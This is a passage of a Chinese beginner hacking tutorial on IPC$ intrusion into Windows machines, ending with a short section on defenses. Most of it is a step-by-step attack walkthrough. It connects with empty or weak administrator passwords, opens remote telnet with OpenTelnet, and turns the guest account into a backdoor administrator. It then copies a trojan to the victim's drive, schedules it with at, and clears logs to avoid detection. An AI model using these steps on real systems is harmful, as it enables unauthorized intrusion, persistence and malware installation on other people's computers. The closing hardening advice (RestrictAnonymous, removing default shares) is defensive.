菜鸟必备:ipc$详细&#35299

十 一些需要shell才能完成的命令

看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成；

2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成；

3 运行/关闭远程主机的服务，需要在shell下完成；

4 启动/杀掉远程主机的进程，也需要在shell下完成。

十一 入侵中可能会用到的相关命令

请注意命令适用于本地还是远程，如果适用于本地，你只能在获得远程主机的shell后，才能向远程主机执行。

1 建立空连接:

net use \IPipc$ "" /user:""

2 建立非空连接:

net use \IPipc$ "psw" /user:"account"

3 查看远程主机的共享资源（但看不到默认共享）

net view \IP

4 查看本地主机的共享资源（可以看到本地的默认共享）

net share

5 得到远程主机的用户名列表

nbtstat -A IP

6 得到本地主机的用户列表

net user

7 查看远程主机的当前时间

net time \IP

8 显示本地主机当前服务

net start

9 启动/关闭本地服务

net start 服务名 /y

net stop 服务名 /y

10 映射远程共享:

net use z: \IPaby

此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del /y删除全部

12 向远程主机复制文件

copy 路径srv.exe \IP共享目录名，如：

copy ccbirds.exe \*.*.*.*c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务

at \ip 时间 程序名，如：

at \127.0.0.0 11:00 love.exe

注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径

14 开启远程主机的telnet

这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求：

1）目标开启了ipc$共享

2）你要拥有管理员密码和帐号

3）目标开启RemoteRegistry服务，用户就该ntlm认证

4）对WIN2K/XP有效，NT未经测试

命令格式：OpenTelnet.exe \server account psw NTLM认证方式 port

试例如下：c:OpenTelnet.exe \*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组

1 net uesr account /active:yes

2 net localgroup administrators account /add

16 关闭远程主机的telnet

同样需要一个小程序：ResumeTelnet.exe

命令格式：ResumeTelnet.exe \server account psw

试例如下：c:ResumeTelnet.exe \*.*.*.* administrator ""

17 删除一个已建立的ipc$连接

net use \IPipc$ /del

十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同，我就说一下常见的吧，呵呵，献丑了！

1 用扫描软件搜寻存在若口令的主机，比如流光，SSS，X-scan等，随你的便，然后锁定目标，如果扫到了管理员权限的口令，你可以进行下面的步骤了，假设你现在得到了administrator的密码为空

2 此时您有两条路可以选择：要么给对方开telnet（命令行）,要么给它传木马（图形界面），那我们就先走telnet这条路吧

3上面开telnet的命令没忘吧，要用到opentelnet这个小程序

c:OpenTelnet.exe \192.168.21.* administrator "" 1 90

如果返回如下信息

*******************************************************

Remote Telnet Configure, by refdom

Email: refdom@263.net

OpenTelnet.exe

Usage:OpenTelnet.exe \server username password NTLMAuthor telnetport

*******************************************************

Connecting \192.168.21.*...Successfully!

NOTICE!!!!!!

The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...

telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!

Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

Disconnecting server...Successfully!

*说明你已经打开了一个端口90的telnet。

4 现在我们telnet上去

telnet 192.168.21.* 90

如果成功，你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了，那么做点什么呢？把guest激活再加入管理组吧，就算留个后门了

5 C:net user guest /active:yes

*将Guest用户激活，也有可能人家的guest本来就试活的，你可以用net user guest看一下它的帐户启用的值是yes还是no

6 C:net user guest 1234

*将Guest的密码改为1234,或者改成你喜欢的密码

7 C:net localgroup administrators guest /add

*将Guest变为Administrator，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了，不过也要提醒您，因为通过安全策略的设置，可以禁止guest等帐户的远程访问，呵呵，如果真是这样，那我们的后门也就白做了，愿上帝保佑Guest。

8 好了，现在我们来走另一条路，给它传个木马玩玩

9 首先，我们先建立起ipc$连接

C:net use \192.168.21.*ipc$ "" /user:administrator

10 既然要上传东西，就要先知道它开了什么共享

C:net view \192.168.21.*

在 \192.168.21.*的共享资源

资源共享名 类型 用途 注释

C Disk

D Disk

命令成功完成。

*好了，我们看到对方共享了C,D两个盘，我们下面就可以向任意一个盘复制文件了。再次声明，因为用net view命令无法看到默认共享，因此通过上面返回的结果，我们并不能判断对方是否开启了默认共享。

11 C:copy love.exe \192.168.21.*c

已复制 1 个文件

*用这个命令你可以将木马客户端love.exe传到对方的c盘下，当然，如果能复制到系统文件夹下是最好的了，不容易被发现

12 运行木马前，我们先看看它现在的时间

net time \192.168.21.*

\192.168.21.*的当前时间是 2003/8/22 上午 11:00

命令成功完成

13 现在我们用at运行它吧，不过对方一定要开了Task Scheduler服务（允许程序在指定时间运行），否则就不行了

C:at \192.168.21.* 11:02 c:love.exe

新加了一项作业，其作业 ID = 1

14 剩下就是等了，等过了11:02，你就可以用控制端去连接了，如果成功你将可以用图形界面去控制远程主机了，如果连接失败，那么它可能在局域网里，也可能程序被防火墙杀了，还可能它下线了（没这么巧吧），无论哪种情况你只好放弃了

嗯，好了，两种基本方法都讲了。如果你对上面的操作已经轻车熟路了，也可以用更高效的套路，比如用CA克隆guest，用psexec执行木马，用命令：psexec \tergetIP -u user -p paswd cmd.exe直接获得shell等，这些都是可以得，随你的便。不过最后不要忘了把日志清理干净，可以用榕哥的elsave.exe。

讲了ipc$的入侵，就不能不说如何防范，那么具体要怎样做呢？看下面

十三 如何防范ipc$入侵

1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

方法1：

运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous = DWORD的键值改为：1

如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但限制通过这种连接得到列举SAM帐号和共享等信息；在Windows 2000 中增加了"2"，限制所有匿名访问除非特别授权，如果设置为2的话,可能会有一些其他问题发生，建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。

方法2：

在本地安全设置－本地策略－安全选项－在'对匿名连接的额外限制'中做相应设置

2 禁止默认共享

1）察看本地共享资源

运行-cmd-输入net share

2）删除共享（重起后默认共享仍然存在）

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务

net stop server /y （重新启动后server服务会重新开启）

4）禁止自动打开默认共享（此操作并未关闭ipc$共享）

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000

• ·各入其位--公网内网使用互不干扰
• ·国际动画设计教程-剧本创作(国际动画设计教程)
• ·网吧需要的额外服务和服务器配置
• ·XP系统网络不能互访七大解决之道
• ·WindowsXP网络应用技巧集锦
• ·WindowsXP操作系统30招网络技巧
• ·巧用注
• ·揭开系统网络邻居的内幕秘密
• ·美少女卡通动漫30日速成|报价￥24.50|图
• ·Windows中的ADSL宽带优化设置